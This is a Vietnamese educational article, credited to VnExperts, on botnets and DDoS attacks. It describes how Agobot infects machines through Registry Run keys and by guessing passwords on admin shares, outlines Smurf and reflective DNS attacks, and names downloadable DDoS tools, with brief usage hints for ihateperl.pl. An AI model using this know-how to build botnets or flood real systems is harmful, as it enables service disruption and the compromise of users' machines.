– Nhưng bạn hãy tưởng tượng có 1000 người như bạn cùng một lúc tấn công vào máy chủ kia khi đó toàn bộ băng thông của 1000 người cộng lại tối đa đạt 3Gbps và tốc độ kết nối của máy chủ là 100 Mbps vậy kết quả sẽ ra sao các bạn có khả năng tưởng tượng.

– Nhưng tôi đang thử hỏi làm cách nào để có 1000 máy tính kết nối với mạng – tôi đi mua một nghìn chiếc và thuê 1000 thuê bao kết nối – chắc chắn tôi không làm như vậy rồi và cũng không kẻ tân công nào sử dụng phương pháp này cả.

– Kẻ tấn công xây dựng một mạng gồm hàng nghìn máy tính kết Internet (có mạng BOT lên tới 400.000 máy). Vậy làm thể nào chúng có khả năng lợi dụng người kết nối tới Internet để xây dựng mạng BOT trong bài viết này tôi sẽ giới thiệu với các bạn các mạng BOT và cách xây dựng, những Tool xây dựng.

– Khi có trong tay mạng BOT kẻ tấn công sử dụng những tool tấn công đơn giản để tấn công vào một hệ thống máy tính. Dựa vào những truy cập hoàn toàn hợp lệ của hệ thống, cùng một lúc chúng sử dụng một dịch vụ của máy chủ, bạn thử tưởng tượng khi kẻ tấn công có trong tay 400.000 máy chủ và cùng một lúc ra lệnh cho chúng download một file trên trang web của bạn. Và đó chính là DDoS – Distributed Denial of Servcie

– Không có một phương thức chống tấn công DDoS một cách hoàn toàn nhưng trong bài viết này tôi cũng giới thiệu với các bạn những phương pháp phòng chống DDoS khi chúng ta đã hiểu về nó.

2. Mạng BOT

– BOT từ viết tắt của từ RoBOT

– IRCbot – còn được gọi là zombia hay drone.

– Internet Relay Chat (IRC) là một dạng truyền dữ liệu thời gian thực trên Internet. Nó thường được thiết kế sao cho một người có thể nhắn được cho một group và mỗi người có thể giao tiếp với nhau với một kênh khác nhau được gọi là – Channels.

– Đầu tiên BOT kết nối kênh IRC với IRC Server và đợi giao tiếp giữa những người với nhau.

– Kẻ tấn công có thể điều khiển mạng BOT và sử dụng mạng BOT cũng như sử dụng nhằm một mục đích nào đó.

– Nhiều mạng BOT kết nối với nhau người ta gọi là BOTNET – botnet.

3. Mạng Botnet.

– Mạng Botnet bao gồm nhiều máy tính

– Nó được sử dụng cho mục đích tấn công DDoS

– Một mạng Botnet nhỏ có thể chỉ bao gồm 1000 máy tính nhưng bạn thử tưởng tượng mỗi máy tính này kết nối tới Internet tốc độ chỉ là 128Kbps thì mạng Botnet này đã có khả năng tạo băng thông là 1000*128 ~ 100Mbps – Đây là một con số thể hiện băng thông mà khó một nhà Hosting nào có thể share cho mỗi trang web của mình.

4. Mục đích sử dụng mạng Botnets

– Tấn công Distributed Denial-of-Service – DDoS

+ Botnet được sử dụng cho tấn công DDoS

– Spamming

+ Mở một SOCKS v4/v5 proxy server cho việc Spamming

– Sniffing traffic

+ Bot cũng có thể sử dụng các gói tin nó sniffer (tóm được các giao tiếp trên mạng) sau khi tóm được các gói tin nó cố gắng giải mã gói tin để lấy được các nội dung có ý nghĩa như tài khoản ngân hàng và nhiều thông tin có giá trị khác của người sử dụng.

– Keylogging

+ Với sự trợ giúp của Keylogger rất nhiều thông tin nhạy cảm của người dùng có thể sẽ bị kẻ tấn công khai thác như tài khoản trên e-banking, cũng như nhiều tài khoản khác.

– Cài đặt và lây nhiễm chương trình độc hại

+ Botnet có thể sử dụng để tạo ra mạng những mạng BOT mới.

– Cài đặt những quảng cáo Popup

+ Tự động bật ra những quảng cáo không mong muốn với người sử dụng.

– Google Adsense abuse

+ Tự động thay đổi các kết quả tìm kiếm hiển thị mỗi khi người dùng sử dụng dịch vụ tìm kiểm của Google, khi thay đổi kết quả nó sẽ lừa người dùng kích vào những trang web nguy hiểm.

– Tấn công vào IRC Chat Networks

+ Nó được gọi là clone attack

– Phishing

+ Mạng botnet còn được sử dụng để phishing mail nhằm lấy các thông tin nhạy cảm của người dùng.

5. Các dạng của mạng BOT.

Agobot/Phatbot/Forbot/XtremBot

– Đây là những bot được viết bằng C++ trên nền tảng Cross-platform và mã nguồn được tìm trên GPL. Agobot được viết bởi Ago nick name được người ta biết đến là Wonk, một thanh niên trẻ người Đức – đã bị bắt hồi tháng 5 năm 2004 với tội danh về tội phạm máy tính.

– Agobot có khả năng sử dụng NTFS Alternate Data Stream (ADS) và như một loại Rootkit nhằm ẩn các tiến trình đang chạy trên hệ thống

SDBot/Rbot/UrBot/UrXbot

– SDBot được viết bằng ngồn ngữ C và cũng được public bởi GPL. Nó đươc coi như là tiền thân của Rbot, RxBot, UrBot, UrXBot, JrBot

mIRC-Based Bots – GT-Bots

– GT được viết tắt tư fhai từ Global Threat và tên thường được sử dụng cho tất cả các mIRC-scripted bots. Nó có khả năng sử dụng phần mềm IM là mIRC để thiết lập một số script và một số đoạn mã khác.

6. Các bước xây dựng mạng BotNet? Cách phân tích mạng Bot.

Để hiểu hơn về xây dựng hệ thống mạng BotNet chúng ta nghiên cứu từ cách lây nhiễm vào một máy tính, cách tạo ra một mạng Bot và dùng mạng Bot này tấn công vào một đích nào đó của mạng Botnet được tạo ra từ Agobot’s.

Bước 1: Cách lây nhiễm vào máy tính.

– Đầu tiên kẻ tấn công lừa cho người dùng chạy file “chess.exe”, một Agobot thường copy chúng vào hệ thống và sẽ thêm các thông số trong Registry để đảm bảo sẽ chạy cùng với hệ thống khi khởi động. Trong Registry có các vị trí cho các ứng dụng chạy lúc khởi động tại.

HKLM\Software\Microsoft\Windows\CurrentVersion\Run

HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices

Bước 2: Cách lây lan và xây dựng tạo mạng BOTNET

– Sau khi trong hệ thống mạng có một máy tính bị nhiễm Agobot, nó sẽ tự động tìm kiếm các máy tính khác trong hệ thống và lây nhiễm sử dụng các lỗ hổng trong tài nguyên được chia sẻ trong hệ thống mạng.

– Chúng thường cố gắng kết nối tới các dữ liệu share mặc định dành cho các ứng dụng quản trị (administrator or administrative) ví dụ như: C$, D$, E$ và print$ bằng cách đoán usernames và password để có thể truy cập được vào một hệ thống khác và lây nhiễm.

– Agobot có thể lây lan rất nhanh bởi chúng có khả năng tận dụng các điểm yếu trong hệ điều hành Windows, hay các ứng dụng, các dịch vụ chạy trên hệ thống.

Bước 3: Kết nối vào IRC.

– Bước tiếp theo của Agobot sẽ tạo ra một IRC-Controlled Backdoor để mở các yếu tố cần thiết, và kết nối tới mạng Botnet thông qua IRC-Controll, sau khi kết nối nó sẽ mở những dịch vụ cần thiết để khi có yêu cầu chúng sẽ được điều khiển bởi kẻ tấn công thông qua kênh giao tiếp IRC.

Bước 4: Điều khiển tấn công từ mạng BotNet.

– Kẻ tấn công điều khiển các máy trong mạng Agobot download những file .exe về chạy trên máy.

– Lấy toàn bộ thông tin liên quan và cần thiết trên hệ thống mà kẻ tấn công muốn.

– Chạy những file khác trên hệ thống đáp ứng yêu cầu của kẻ tấn công.

– Chạy những chương trình DDoS tấn công hệ thống khác.

7. Sơ đồ cách hệ thống bị lây nhiễm và sử dụng Agobot.

VII. Các tools tấn công DDoS

1. Nuclear Bot.

– Nuclear Bot là một tool cực mạnh “Multi Advanced IRC BOT” có thể sử dụng để Floods, Managing, Utilities, Spread, IRC Related, tấn công DDoS và nhiều mục đích khác.

VIII. Tấn công DDoS

Trên Internet tấn công Distributed Denial of Service là một dạng tấn công từ nhiều máy tính tới một đích, nó gây ra từ chối các yêu cầu hợp lệ của các user bình thường. Bằng cách tạo ra những gói tin cực nhiều đến một đích cụ thể, nó có thể gây tình trạng tương tự như hệ thống bị shutdown.

2. Các đặc tính của tấn công DDoS.

– Nó được tấn công từ một hệ thống các máy tính cực lớn trên Internet, và thường dựa vào các dịch vụ có sẵn trên các máy tính trong mạng botnet

– Các dịch vụ tấn công được điều khiển từ những “primary victim” trong khi các máy tính bị chiếm quyền sử dụng trong mạng Bot được sử dụng để tấn công thường được gọi là “secondary victims”.

– Là dạng tấn công rất khó có thể phát hiện bởi tấn công này được sinh ra từ nhiều địa chỉ IP trên Internet.

– Nếu một địa chỉ IP tấn công một công ty, nó có thể được chặn bởi Firewall. Nếu nó từ 30.000 địa chỉ IP khác, thì điều này là vô cùng khó khăn.

– Thủ phạm có thể gây nhiều ảnh hưởng bởi tấn công từ chối dịch vụ DoS, và điều này càng nguy hiểm hơn khi chúng sử dụng một hệ thống mạng Bot trên internet thực hiện tấn công DoS và đó được gọi là tấn công DDoS.

3. Tấn công DDoS không thể ngăn chặn hoàn toàn.

– Các dạng tấn công DDoS thực hiện tìm kiếm các lỗ hổng bảo mật trên các máy tính kết nối tới Internet và khai thác các lỗ hổng bảo mật để xây dựng mạng Botnet gồm nhiều máy tính kết nối tới Internet.

– Một tấn công DDoS được thực hiện sẽ rất khó để ngăn chặn hoàn toàn.

– Những gói tin đến Firewall có thể chặn lại, nhưng hầu hết chúng đều đến từ những địa chỉ IP chưa có trong các Access Rule của Firewall và là những gói tin hoàn toàn hợp lệ.

– Nếu địa chỉ nguồn của gói tin có thể bị giả mạo, sau khi bạn không nhận được sự phản hồi từ những địa chỉ nguồn thật thì bạn cần phải thực hiện cấm giao tiếp với địa chỉ nguồn đó.

– Tuy nhiên một mạng Botnet bao gồm từ hàng nghìn tới vài trăm nghìn địa chỉ IP trên Internet và điều đó là vô cùng khó khăn để ngăn chặn tấn công.

4. Kẻ tấn công khôn ngoan.

Giờ đây không một kẻ tấn công nào sử dụng luôn địa chỉ IP để điều khiển mạng Botnet tấn công tới đích, mà chúng thường sử dụng một đối tượng trung gian dưới đây là những mô hình tấn công DDoS

a. Agent Handler Model

Kẻ tấn công sử dụng các handler để điều khiển tấn công

b. Tấn công DDoS dựa trên nền tảng IRC

Kẻ tấn công sử dụng các mạng IRC để điều khiển, khuyếch đại và quản lý kết nối với các máy tính trong mạng Botnet.

IX. Phân loại tấn công DDoS

– Tấn công gây hết băng thông truy cập tới máy chủ.

+ Flood attack

+ UDP và ICMP Flood (flood – gây ngập lụt)

– Tấn công khuếch đại các giao tiếp

+ Smurf and Fraggle attack

Tấn công DDoS vào Yahoo.com năm 2000

Sơ đồ phân loại tấn công DDoS

Sơ đồ tấn công DDoS ở dạng Khuếch đại giao tiếp.

Như các bạn biết tấn công Smurf khi sử dụng sẽ Ping đến địa chỉ Broadcast của một mạng nào đó mà địa chỉ nguồn chính là địa chỉ của máy cần tấn công, khi đó toàn bộ các gói Reply sẽ được chuyển tới địa chỉ IP của máy tính bị tấn công.

X. Tấn công Reflective DNS (reflective – phản chiếu).

a. Các vấn đề liên quan tới tấn công Reflective DNS

– Một Hacker có thể sử dụng mạng botnet để gửi rất nhiều yêu cầu tới máy chủ DNS.

– Những yêu cầu sẽ làm tràn băng thông mạng của các máy chủ DNS,

– Việc phòng chống dạng tấn công này có thể dùng Firewall ngăn cấm những giao tiếp từ các máy tính được phát hiện ra.

– Nhưng việc cấm các giao tiếp từ DNS Server sẽ có nhiều vấn đề lớn. Một DNS Server có nhiệm vụ rất quan trọng trên Internet.

– Việc cấm các giao tiếp DNS đồng nghĩa với việc cấm người dùng bình thường gửi mail và truy cập Website.

– Một yêu cầu về DNS thường chiếm bằng 1/73 thời gian của gói tin trả lời trên máy chủ. Dựa vào yếu tố này nếu dùng một Tools chuyên nghiệp để làm tăng các yêu cầu tới máy chủ DNS sẽ khiến máy chủ DNS bị quá tải và không thể đáp ứng cho các người dùng bình thường được nữa.

b. Tool tấn công Reflective DNS – ihateperl.pl

– ihateperl.pl là chương trình rất nhỏ, rất hiệu quả, dựa trên kiểu tấn công DNS-Reflective

– Nó sử dụng một danh sách các máy chủ DNS để làm tràn hệ thống mạng với các gói yêu cầu Name Resolution.

– Bằng một ví dụ nó có thể sử dụng google.com để resole gửi tới máy chủ và có thể đổi tên domain đó thành http://www.vnexperts.net hay bất kỳ một trang web nào mà kẻ tấn công muôn.

– Để sử dụng công cụ này, rất đơn giản bạn tạo ra một danh sách các máy chủ DNS, chuyển cho địa chỉ IP của máy cá nhân và thiết lập số lượng các giao tiếp.

XI. Các tools sử dụng để tấn công DDoS.

Trong toàn bộ các tools tôi giới thiệu trong bài viết này hầu hết là các tools cũ và không hiệu quả, và chỉ mang tính chất sư phạm để các bạn có thể hiểu về dạng tấn công DDoS hơn mà thôi. Dưới đây là các Tools tấn công DDoS.

– Trinoo –    Tribe flood Network (TFN) –    TFN2K –    Stacheldraht –    Shaft

– Trinity –    Knight –    Mstream –   Kaiten

Các tools này bạn hoàn toàn có thể Download miễn phí trên Internet và lưu ý là chỉ để thử đây là các tools yếu và chỉ mang tính Demo về tấn công DdoS mà thôi.

Theo VnExperts

Đấu giá trực tuyến hàng đầu Việt Nam